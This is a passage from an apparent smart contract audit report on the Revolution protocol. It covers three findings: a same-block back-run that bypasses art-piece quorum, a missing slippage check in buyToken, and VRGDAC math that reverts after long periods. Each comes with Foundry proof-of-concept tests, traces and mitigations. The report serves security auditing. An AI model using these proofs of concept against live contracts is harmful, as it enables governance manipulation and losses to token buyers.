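The gap between the cached quorum and the quorum implied by the end-of-block supply can be modelled in a few lines. This is a sketch under stated assumptions: CachedQuorumModel, its functions, and the 10% quorum are hypothetical, and a single totalSupply counter stands in for both voting tokens.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Illustrative model only. All names and values here are hypothetical.
contract CachedQuorumModel {
    uint256 public constant QUORUM_BPS = 1_000; // assumed 10% quorum
    uint256 public totalSupply; // stands in for the combined voting supply
    uint256 public cachedQuorum; // stands in for newPiece.quorumVotes

    // Caches the quorum from the supply at the moment of creation.
    function createPiece() external {
        cachedQuorum = (QUORUM_BPS * totalSupply) / 10_000;
    }

    // Stands in for a token purchase landing later in the same block.
    function buy(uint256 amount) external {
        totalSupply += amount;
    }

    // Quorum that the supply at this point would imply.
    function quorumAtCurrentSupply() external view returns (uint256) {
        return (QUORUM_BPS * totalSupply) / 10_000;
    }
}
```

Calling createPiece() with a supply of 0 and then buy(100e18) leaves cachedQuorum at 0, while quorumAtCurrentSupply() returns 10e18. The buyer's voting power counts toward the piece, but the threshold it has to meet was fixed before that power existed.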

POC: This POC demonstrates the first case, in which a voter back-runs the createPiece transaction so that totalVotesSupply and quorumVotes are understated.

- Navigate to: cd packages/revolution

- Create a test file: test/BypassQuorum.t.sol

- Execute: forge test -vvvvv --match-path test/BypassQuorum.t.sol --match-test testBypassquorumVotes

// SPDX-License-Identifier: MIT

pragma solidity 0.8.22;

import { Test } from "forge-std/Test.sol";

import {console} from "forge-std/console.sol";

import { AuctionHouseTest } from "./auction/AuctionHouse.t.sol";

import { IERC20TokenEmitter } from "../../src/interfaces/IERC20TokenEmitter.sol";

contract POCTest is AuctionHouseTest {

function testBypassquorumVotes() public {

uint256 verbId0 = createDefaultArtPiece();

(,,,,uint256 creationBlock ,uint256 quorumVotes,,uint256 totalVotesSupply)= cultureIndex.pieces(0);

console.log("creationBlock: ", creationBlock); // creationBlock: 1

console.log("quorumVotes: ", quorumVotes); // quorumVotes: 0

console.log("totalVotesSupply: ", totalVotesSupply); // totalVotesSupply: 0

// The voter back-runs the createPiece transaction and buys vote tokens in the same block; the new supply is not reflected in the piece info, so the quorum is understated at 0

uint256 buyAmount = 100 ether;

vm.deal(address(21), buyAmount);

address[] memory recipients = new address[](1);

recipients[0] = address(1);

uint256[] memory bps = new uint256[](1);

bps[0] = 10_000;

vm.stopPrank();

vm.prank(address(21));

erc20TokenEmitter.buyToken{ value: buyAmount }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

console.log("Should be quorum: ", cultureIndex.quorumVotes()); // Should be quorum: 1940052234587701020

}

}

Recommended Mitigation Steps

When the piece is created, store only the creationBlock, not the quorum. The quorum should instead be calculated on demand using VotesUpgradeable.getPastTotalSupply, which returns the total supply at the end of the given block.

This ensures that quorumVotes accurately reflects the voting power at the end of the block in which the art piece was created, thereby mitigating the risk of quorum bypass through token supply manipulation within the same block.

function dropTopVotedPiece() public nonReentrant returns (ArtPiece memory) {

require(msg.sender == dropperAdmin, "Only dropper can drop pieces");

ICultureIndex.ArtPiece memory piece = getTopVotedPiece();

- require(totalVoteWeights[piece.pieceId] >= piece.quorumVotes, "Does not meet quorum votes to be dropped.");

+ uint256 totalVotesSupply = _calculateVoteWeight(

+ erc20VotingToken.getPastTotalSupply(piece.creationBlock),

+ erc721VotingToken.getPastTotalSupply(piece.creationBlock)

+ );

+ uint256 quorumVotes = (quorumVotesBPS * totalVotesSupply) / 10_000;

+ require(totalVoteWeights[piece.pieceId] >= quorumVotes, "Does not meet quorum votes to be dropped.");

rocketman-21 (Revolution) confirmed

[M-05] Since buyToken function has no slippage checking, users can get less tokens than expected when they buy tokens directly

Submitted by deepplus, also found by Aymen0909, adeolu, passteque, jnforja, KupiaSec, Tricko, wangxx2026, zhaojie, 0xDING99YA, SadeeqXmosh, DanielArmstrong, SpicyMeatball, 0xmystery, Inference, and rvierdiiev

Users can buy NontransferableERC20Token by calling the buyToken function directly. The amount of tokens they expect to receive is determined by the current supply and the amount of ether they pay. However, if other transactions (such as settleAuction or another user’s buyToken) execute ahead of the caller’s transaction, the caller can receive fewer tokens than expected.

Proof of Concept

The VRGDAC exponentially increases the price of tokens whenever the supply is ahead of schedule. Therefore, if another purchase front-runs a user’s buyToken transaction, the token price can rise above what the user expected.

For instance, let’s assume that ERC20TokenEmitter is initialized with following params:

- target price: 1 ether

- decay percent: 10 %

- per time unit: 10 ether

To keep things simple, assume that the token supply so far is consistent with the schedule. When Alice tries to buy tokens with 5 ether, the expected amount is calculated by getTokenQuoteForEther(5 ether), and the value is about 4.87 ether.

However, if Bob’s transaction to buy tokens with 10 ether is executed before Alice’s, the actual amount Alice receives is about 4.43 ether.

You can check the result with the following test:

function testBuyTokenWithoutSlippageCheck() public {

address alice = makeAddr("Alice");

address bob = makeAddr("Bob");

vm.deal(address(alice), 100000 ether);

vm.deal(address(bob), 100000 ether);

address[] memory recipients = new address[](1);

recipients[0] = address(1);

uint256[] memory bps = new uint256[](1);

bps[0] = 10_000;

// expected amount of minting token when alice calls buyToken

int256 expectedAmount = erc20TokenEmitter.getTokenQuoteForEther(5 ether);

vm.startPrank(bob);

// assume that bob calls buy token with 10 ether

erc20TokenEmitter.buyToken{ value: 10 ether }(

recipients,

bps,

IERC20TokenEmitter.ProtocolRewardAddresses({

builder: address(0),

purchaseReferral: address(0),

deployer: address(0)

})

);

vm.stopPrank();

vm.startPrank(alice);

// calculate the amount of tokens which alice will actually receive

int256 realAmount = erc20TokenEmitter.getTokenQuoteForEther(5 ether);

vm.stopPrank();

emit log_string("Expected Amount: ");

emit log_int(expectedAmount);

emit log_string("Real Amount: ");

emit log_int(realAmount);

assertLt(realAmount, expectedAmount, "Alice should receive less than expected if Bob frontrun buyToken");

}

Therefore, Alice receives about 0.44 ether fewer tokens than expected, since the buyToken function has no slippage check.

Tools Used

VS Code

Recommended Mitigation Steps

Add a slippage check to the buyToken function. The check should run only when a user calls buyToken directly; it should not run when settleAuction calls buyToken.
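A minimal sketch of such a check follows. It is an illustration under stated assumptions, not the project's implementation: IEmitterQuote, SlippageGuardSketch, quoteWithMinimum and the minTokensOut parameter are hypothetical names, and only getTokenQuoteForEther (as called in the test above) is taken from the report. In the real contract the comparison would most likely sit inside buyToken, applied to the ether amount that actually reaches the VRGDAC after rewards and creator splits, with the auction path passing a minimum of 0.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Hypothetical minimal view of the emitter: only the quote
///         function exercised in the test above.
interface IEmitterQuote {
    function getTokenQuoteForEther(uint256 etherAmount) external view returns (int256 gainedX);
}

/// @notice Illustrative only; not part of the audited code base.
contract SlippageGuardSketch {
    /// @dev Returns the quoted token amount, reverting if it falls below
    ///      the caller-supplied minimum (minTokensOut is an assumed parameter).
    function quoteWithMinimum(
        IEmitterQuote emitter,
        uint256 etherAmount,
        uint256 minTokensOut
    ) public view returns (uint256 tokensOut) {
        int256 quoted = emitter.getTokenQuoteForEther(etherAmount);
        require(quoted > 0, "Quote must be positive");

        tokensOut = uint256(quoted);
        // The slippage check: revert instead of silently minting fewer tokens.
        require(tokensOut >= minTokensOut, "Slippage: fewer tokens than minTokensOut");
    }
}
```

With the figures from the example, Alice could pass a minTokensOut slightly below her 4.87 ether quote; if Bob's purchase lands first and the quote drops to about 4.43 ether, her transaction would revert rather than fill at the worse price.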

rocketman-21 (Revolution) acknowledged and commented:

This is intended and a consequence of how the VRGDA functions, when people buy tokens the price goes up if it is ahead of schedule.

Not ideal UX, but not going to fix for now.

Even though the increasing price is intended, it’s state of the art to introduce a slippage parameter to protect users from receiving less than expected. Therefore, maintaining Medium severity seems appropriate.

[M-06] ERC20TokenEmitter will not work after a certain period of time

Submitted by zhaojie, also found by jerseyjoewalcott

The vrgdac.xToY function reverts once timeSinceStart exceeds a certain value, causing the ERC20TokenEmitter#buyToken function to always revert.

Proof of Concept

Initialize the VRGDAC using the parameters in the test code.

VRGDAC vrgdac = new VRGDAC(1 ether, 1e18 / 10, 1_000 * 1e18);

The timeSinceStart is set to 400 days in the test code:

function testVRGDAC_time() public {

VRGDAC vrgdac = new VRGDAC(1 ether, 1e18 / 10, 1_000 * 1e18);

int256 x = vrgdac.yToX({

timeSinceStart: toDaysWadUnsafe(86400 * 400),

sold: 1000 ether,

amount: 1 ether

});

uint256 xx = uint256(x);

console.log(xx + 1);

console.log(xx / 1e18);

}

Run forge test -vvvv; the console outputs:

[FAIL. Reason: UNDEFINED] testVRGDAC_time() (gas: 554525)

Traces:

[106719] CounterTest::setUp()

├─ [49499] → new Counter@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f

│ └─ ← 247 bytes of code

├─ [2390] Counter::setNumber(0)

│ └─ ← ()

└─ ← ()

[554525] CounterTest::testVRGDAC_time()

├─ [517512] → new VRGDAC@0x2e234DAe75C793f67A35089C9d99245E1C58470b

│ └─ ← 2578 bytes of code

├─ [3617] VRGDAC::yToX(400000000000000000000, 1000000000000000000000, 1000000000000000000) [staticcall]

│ └─ ← "UNDEFINED"

└─ ← "UNDEFINED"

Changing the timeSinceStart to toDaysWadUnsafe(86400 * 365) will work.

When this function is used in ERC20TokenEmitter#buyToken, the timeSinceStart is block.timestamp - startTime:

function buyTokenQuote(uint256 amount) public view returns (int spentY) {

require(amount > 0, "Amount must be greater than 0");

return

vrgdac.xToY({

timeSinceStart: toDaysWadUnsafe(block.timestamp - startTime),

sold: emittedTokenWad,

amount: int(amount)

});

}

startTime is set during the initialization of the ERC20TokenEmitter contract:

function initialize(

address _initialOwner,

address _erc20Token,

address _treasury,

address _vrgdac,

address _creatorsAddress

) external initializer {

.....

startTime = block.timestamp;

}

In other words, about 400 days after the ERC20TokenEmitter contract is deployed and initialized (400 days is the test value; the actual value depends on the other parameters), it becomes unavailable: calling the buyToken function will always revert.

Tools Used

VS Code

Recommended Mitigation Steps

Optimize the vrgdac.yToX function, or cap timeSinceStart at a maximum value that is used whenever the elapsed time exceeds it.
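The second suggestion, bounding timeSinceStart before it reaches the VRGDAC math, could look roughly like the sketch below. Everything in it is an assumption made for illustration: TimeCapSketch, cappedElapsed and MAX_SECONDS are hypothetical names, and the 365-day bound is chosen only because the report observes that 365 days works with the test parameters. A real bound would depend on the VRGDAC parameters, capping also stops the price from decaying further, and the fix linked in the sponsor's comment may take a different approach.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

/// @notice Illustrative only; not part of the audited code base.
library TimeCapSketch {
    /// @dev Hypothetical upper bound on the elapsed time fed to the VRGDAC.
    uint256 internal constant MAX_SECONDS = 365 days;

    /// @dev Returns the seconds elapsed since startTime, clamped to MAX_SECONDS.
    ///      Reverts on underflow if nowTime is earlier than startTime.
    function cappedElapsed(uint256 startTime, uint256 nowTime) internal pure returns (uint256) {
        uint256 elapsed = nowTime - startTime;
        return elapsed > MAX_SECONDS ? MAX_SECONDS : elapsed;
    }
}
```

Under this sketch, the quote functions would pass toDaysWadUnsafe(TimeCapSketch.cappedElapsed(startTime, block.timestamp)) instead of toDaysWadUnsafe(block.timestamp - startTime).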

rocketman-21 (Revolution) confirmed and commented:

Looked into this extensively, it operates under the assumption that the token emission schedule (# sold) will be way off schedule. eg: over a year, 75%+ lower than expected according to the target sale per time unit.

In that case, after a prolonged amount of time, the math in the VRGDA will break due to a param reaching 0 in the available fixed point decimals. given the VRGDA pricing mechanism decreases the price, my assumption is that in a rational market we will never reach the above case, because tokens will become cheaper and cheaper. or the DAO/community will be dead and no one wants to buy tokens anymore.

However, upon second look here - I do think this is valid.

I was able to reproduce the VRGDA breaking in multiple different scenarios due to precision loss in the VRGDA math

even if the supply was way off schedule, there could be scenarios imho where the community sets a large perTimeUnit and targetPrice and never meets that volume, and after 1+ years their vrgda will likely break

fix here: https://github.com/collectivexyz/revolution-protocol/commit/2bd0b35df870097be166a0d57af0a1f0d62a7518

@rocketman-21 Thanks for this insight, as far as I can reproduce the PoCs it’s hard to distinguish if this can have an impact on the protocol or just arises under unrealistic assumptions.